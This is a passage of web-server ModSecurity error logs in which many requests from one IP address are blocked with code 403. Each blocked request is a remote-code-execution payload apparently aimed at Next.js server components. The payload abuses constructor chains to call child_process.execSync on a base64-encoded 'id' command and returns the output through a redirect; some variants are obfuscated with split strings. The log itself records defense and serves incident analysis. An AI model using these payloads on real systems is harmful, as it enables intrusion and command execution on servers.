"aYvpXB9ayL7wRi2xttsBSAAAAMY"] [Wed Feb 11 04:28:44.721219 2026] [:error] [pid 18849:tid 18864] [client 195.178.110.195:58824] [client 195.178.110.195] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22_response\\x22:{\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var _alaj=process.mainModule.require('child_process').execSync(Buffer.from('aWQ=','base64').toString()).toString().trim();var _notu=Buffer.from(_alaj).toString('base64');throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`NEXT_REDIRECT;push;/login?a=${_notu};307;`});\\x22},\\x22reason\\x22:-1,\\x22status\\x22:\\x22resolved_model\\x22,..."] [sever [hostname "www.cms-1.dev-unit.com"] [uri "/en/"] [unique_id "aYvpXB9ayL7wRi2xttsBSgAAAM0"] [Wed Feb 11 04:28:44.799482 2026] [:error] [pid 18849:tid 18875] [client 195.178.110.195:58824] [client 195.178.110.195] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22_response\\x22:{\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var _nyxv=process.mainModule.require('child_process').execSync(Buffer.from('aWQ=','base64').toString()).toString().trim();var _waev=Buffer.from(_nyxv).toString('base64');throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`NEXT_REDIRECT;push;/login?a=${_waev};307;`});\\x22},\\x22reason\\x22:-1,\\x22status\\x22:\\x22resolved_model\\x22,..."] [sever [hostname "www.cms-1.dev-unit.com"] [uri "/app/"] [unique_id "aYvpXB9ayL7wRi2xttsBSwAAANg"] [Wed Feb 11 04:28:44.876405 2026] [:error] [pid 18849:tid 18867] [client 195.178.110.195:58824] [client 195.178.110.195] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22_response\\x22:{\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var _yzob=process.mainModule.require('child_process').execSync(Buffer.from('aWQ=','base64').toString()).toString().trim();var _xmww=Buffer.from(_yzob).toString('base64');throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`NEXT_REDIRECT;push;/login?a=${_xmww};307;`});\\x22},\\x22reason\\x22:-1,\\x22status\\x22:\\x22resolved_model\\x22,..."] [sever [hostname "www.cms-1.dev-unit.com"] [uri "/api/"] [unique_id "aYvpXB9ayL7wRi2xttsBTAAAANA"] [Wed Feb 11 04:28:44.953307 2026] [:error] [pid 18849:tid 18865] [client 195.178.110.195:58824] [client 195.178.110.195] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22_response\\x22:{\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var _enlq=process.mainModule.require('child_process').execSync(Buffer.from('aWQ=','base64').toString()).toString().trim();var _xasn=Buffer.from(_enlq).toString('base64');throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`NEXT_REDIRECT;push;/login?a=${_xasn};307;`});\\x22},\\x22reason\\x22:-1,\\x22status\\x22:\\x22resolved_model\\x22,..."] [sever [hostname "www.cms-1.dev-unit.com"] [uri "/_next/"] [unique_id "aYvpXB9ayL7wRi2xttsBTQAAAM4"] [Wed Feb 11 04:28:45.030111 2026] [:error] [pid 18849:tid 18868] [client 195.178.110.195:58824] [client 195.178.110.195] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22_response\\x22:{\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var _oczm=process.mainModule.require('child_process').execSync(Buffer.from('aWQ=','base64').toString()).toString().trim();var _sncr=Buffer.from(_oczm).toString('base64');throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`NEXT_REDIRECT;push;/login?a=${_sncr};307;`});\\x22},\\x22reason\\x22:-1,\\x22status\\x22:\\x22resolved_model\\x22,..."] [sever [hostname "www.cms-1.dev-unit.com"] [uri "/"] [unique_id "aYvpXB9ayL7wRi2xttsBTgAAANE"] [Wed Feb 11 04:28:45.104743 2026] [:error] [pid 18849:tid 18853] [client 195.178.110.195:58824] [client 195.178.110.195] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22_response\\x22:{\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var _mzxa=process['main' 'Module']['req' 'uire']('chi' 'ld_pro' 'cess')['exec' 'Sync'](Buffer.from('aWQ=','base64').toString()).toString().trim();var _zaed=Buffer.from(_mzxa).toString('base64');throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`NEXT_REDIRECT;push;/login?a=${_zaed};307;`});\\x22},\\x22reason\\x22:-1,\\x22status\\x22..."] [sever [hostname "www.cms-1.dev-unit.com"] [uri "/"] [unique_id "aYvpXR9ayL7wRi2xttsBTwAAAMI"] [Wed Feb 11 04:28:45.179984 2026] [:error] [pid 18849:tid 18870] [client 195.178.110.195:58824] [client 195.178.110.195] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22_response\\x22:{\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var _lort=process.mainModule.require('child_process').execSync(Buffer.from('aWQ=','base64').toString()).toString().trim();var _qksv=Buffer.from(_lort).toString('base64');throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`NEXT_REDIRECT;push;/login?a=${_qksv};307;`});\\x22},\\x22reason\\x22:-1,\\x22status\\x22:\\x22resolved_model\\x22,..."] [sever [hostname "www.cms-1.dev-unit.com"] [uri "/en/"] [unique_id "aYvpXR9ayL7wRi2xttsBUAAAANM"] [Wed Feb 11 04:28:45.256002 2026] [:error] [pid 18849:tid 18854] [client 195.178.110.195:58824] [client 195.178.110.195] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22_response\\x22:{\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var _dktf=process.mainModule.require('child_process').execSync(Buffer.from('aWQ=','base64').toString()).toString().trim();var _snmt=Buffer.from(_dktf).toString('base64');throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`NEXT_REDIRECT;push;/login?a=${_snmt};307;`});\\x22},\\x22reason\\x22:-1,\\x22status\\x22:\\x22resolved_model\\x22,..."] [sever [hostname "www.cms-1.dev-unit.com"] [uri "/app/"] [unique_id "aYvpXR9ayL7wRi2xttsBUgAAAMM"] [Wed Feb 11 04:28:45.331338 2026] [:error] [pid 18849:tid 18856] [client 195.178.110.195:58824] [client 195.178.110.195] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22_response\\x22:{\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var _thgg=process.mainModule.require('child_process').execSync(Buffer.from('aWQ=','base64').toString()).toString().trim();var _reaf=Buffer.from(_thgg).toString('base64');throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`NEXT_REDIRECT;push;/login?a=${_reaf};307;`});\\x22},\\x22reason\\x22:-1,\\x22status\\x22:\\x22resolved_model\\x22,..."] [sever [hostname "www.cms-1.dev-unit.com"] [uri "/api/"] [unique_id "aYvpXR9ayL7wRi2xttsBUwAAAMU"] [Wed Feb 11 04:28:45.404052 2026] [:error] [pid 18849:tid 18858] [client 195.178.110.195:58824] [client 195.178.110.195] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22_response\\x22:{\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var _rgqp=process.mainModule.require('child_process').execSync(Buffer.from('aWQ=','base64').toString()).toString().trim();var _msbp=Buffer.from(_rgqp).toString('base64');throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`NEXT_REDIRECT;push;/login?a=${_msbp};307;`});\\x22},\\x22reason\\x22:-1,\\x22status\\x22:\\x22resolved_model\\x22,..."] [sever [hostname "www.cms-1.dev-unit.com"] [uri "/_next/"] [unique_id "aYvpXR9ayL7wRi2xttsBVAAAAMc"] [Wed Feb 11 04:28:45.473094 2026] [:error] [pid 18849:tid 18873] [client 195.178.110.195:58824] [client 195.178.110.195] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22_response\\x22:{\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var _dzfd=process.mainModule.require('child_process').execSync(Buffer.from('aWQ=','base64').toString()).toString().trim();var _anhu=Buffer.from(_dzfd).toString('base64');throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`NEXT_REDIRECT;push;/login?a=${_anhu};307;`});\\x22},\\x22reason\\x22:-1,\\x22status\\x22:\\x22resolved_model\\x22,..."] [sever [hostname "www.cms-1.dev-unit.com"] [uri "/"] [unique_id "aYvpXR9ayL7wRi2xttsBVQAAANY"] [Wed Feb 11 04:28:45.540631 2026] [:error] [pid 18849:tid 18866] [client 195.178.110.195:58824] [client 195.178.110.195] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22_response\\x22:{\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var _erlp=process['main' 'Module']['req' 'uire']('chi' 'ld_pro' 'cess')['exec' 'Sync'](Buffer.from('aWQ=','base64').toString()).toString().trim();var _ipsi=Buffer.from(_erlp).toString('base64');throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`NEXT_REDIRECT;push;/login?a=${_ipsi};307;`});\\x22},\\x22reason\\x22:-1,\\x22status\\x22..."] [sever [hostname "www.cms-1.dev-unit.com"] [uri "/"] [unique_id "aYvpXR9ayL7wRi2xttsBVwAAAM8"] [Wed Feb 11 04:28:45.608158 2026] [:error] [pid 18849:tid 18871] [client 195.178.110.195:58824] [client 195.178.110.195] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22_response\\x22:{\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var _fnsf=process.mainModule.require('child_process').execSync(Buffer.from('aWQ=','base64').toString()).toString().trim();var _eboo=Buffer.from(_fnsf).toString('base64');throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`NEXT_REDIRECT;push;/login?a=${_eboo};307;`});\\x22},\\x22reason\\x22:-1,\\x22status\\x22:\\x22resolved_model\\x22,..."] [sever [hostname "www.cms-1.dev-unit.com"] [uri "/en/"] [unique_id "aYvpXR9ayL7wRi2xttsBWAAAANQ"] [Wed Feb 11 04:28:45.677110 2026] [:error] [pid 18849:tid 18874] [client 195.178.110.195:58824] [client 195.178.110.195] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22_response\\x22:{\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var _blzr=process.mainModule.require('child_process').execSync(Buffer.from('aWQ=','base64').toString()).toString().trim();var _vzty=Buffer.from(_blzr).toString('base64');throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`NEXT_REDIRECT;push;/login?a=${_vzty};307;`});\\x22},\\x22reason\\x22:-1,\\x22status\\x22:\\x22resolved_model\\x22,..."] [sever [hostname "www.cms-1.dev-unit.com"] [uri "/app/"] [unique_id "aYvpXR9ayL7wRi2xttsBWQAAANc"] [Wed Feb 11 04:28:45.745137 2026] [:error] [pid 18849:tid 18860] [client 195.178.110.195:58824] [client 195.178.110.195] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22_response\\x22:{\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var _ulpx=process.mainModule.require('child_process').execSync(Buffer.from('aWQ=','base64').toString()).toString().trim();var _jbny=Buffer.from(_ulpx).toString('base64');throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`NEXT_REDIRECT;push;/login?a=${_jbny};307;`});\\x22},\\x22reason\\x22:-1,\\x22status\\x22:\\x22resolved_model\\x22,..."] [sever [hostname "www.cms-1.dev-unit.com"] [uri "/api/"] [unique_id "aYvpXR9ayL7wRi2xttsBWwAAAMk"] [Wed Feb 11 04:28:45.821876 2026] [:error] [pid 18849:tid 18852] [client 195.178.110.195:58824] [client 195.178.110.195] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22_response\\x22:{\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var _woiq=process.mainModule.require('child_process').execSync(Buffer.from('aWQ=','base64').toString()).toString().trim();var _ryyq=Buffer.from(_woiq).toString('base64');throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`NEXT_REDIRECT;push;/login?a=${_ryyq};307;`});\\x22},\\x22reason\\x22:-1,\\x22status\\x22:\\x22resolved_model\\x22,..."] [sever [hostname "www.cms-1.dev-unit.com"] [uri "/_next/"] [unique_id "aYvpXR9ayL7wRi2xttsBXAAAAME"] [Wed Feb 11 04:28:45.887893 2026] [:error] [pid 18849:tid 18872] [client 195.178.110.195:58824] [client 195.178.110.195] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22_response\\x22:{\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var _bcex=process.mainModule.require('child_process').execSync(Buffer.from('aWQ=','base64').toString()).toString().trim();var _xpcr=Buffer.from(_bcex).toString('base64');throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`NEXT_REDIRECT;push;/login?a=${_xpcr};307;`});\\x22},\\x22reason\\x22:-1,\\x22status\\x22:\\x22resolved_model\\x22,..."] [sever [hostname "www.cms-1.dev-unit.com"] [uri "/"] [unique_id "aYvpXR9ayL7wRi2xttsBXQAAANU"] [Wed Feb 11 04:28:45.953623 2026] [:error] [pid 18849:tid 18859] [client 195.178.110.195:58824] [client 195.178.110.195] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22_response\\x22:{\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var _pdro=process['main' 'Module']['req' 'uire']('chi' 'ld_pro' 'cess')['exec' 'Sync'](Buffer.from('aWQ=','base64').toString()).toString().trim();var _jqvv=Buffer.from(_pdro).toString('base64');throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`NEXT_REDIRECT;push;/login?a=${_jqvv};307;`});\\x22},\\x22reason\\x22:-1,\\x22status\\x22..."] [sever [hostname "www.cms-1.dev-unit.com"] [uri "/"] [unique_id "aYvpXR9ayL7wRi2xttsBXgAAAMg"] [Wed Feb 11 04:28:46.019163 2026] [:error] [pid 18849:tid 18857] [client 195.178.110.195:58824] [client 195.178.110.195] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22_response\\x22:{\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var _jnug=process.mainModule.require('child_process').execSync(Buffer.from('aWQ=','base64').toString()).toString().trim();var _lmbw=Buffer.from(_jnug).toString('base64');throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`NEXT_REDIRECT;push;/login?a=${_lmbw};307;`});\\x22},\\x22reason\\x22:-1,\\x22status\\x22:\\x22resolved_model\\x22,..."] [sever [hostname "www.cms-1.dev-unit.com"] [uri "/en/"] [unique_id "aYvpXR9ayL7wRi2xttsBXwAAAMY"] [Wed Feb 11 04:28:46.084175 2026] [:error] [pid 18849:tid 18851] [client 195.178.110.195:58824] [client 195.178.110.195] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22_response\\x22:{\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var _xlmy=process.mainModule.require('child_process').execSync(Buffer.from('aWQ=','base64').toString()).toString().trim();var _xpyn=Buffer.from(_xlmy).toString('base64');throw Object.assign(new 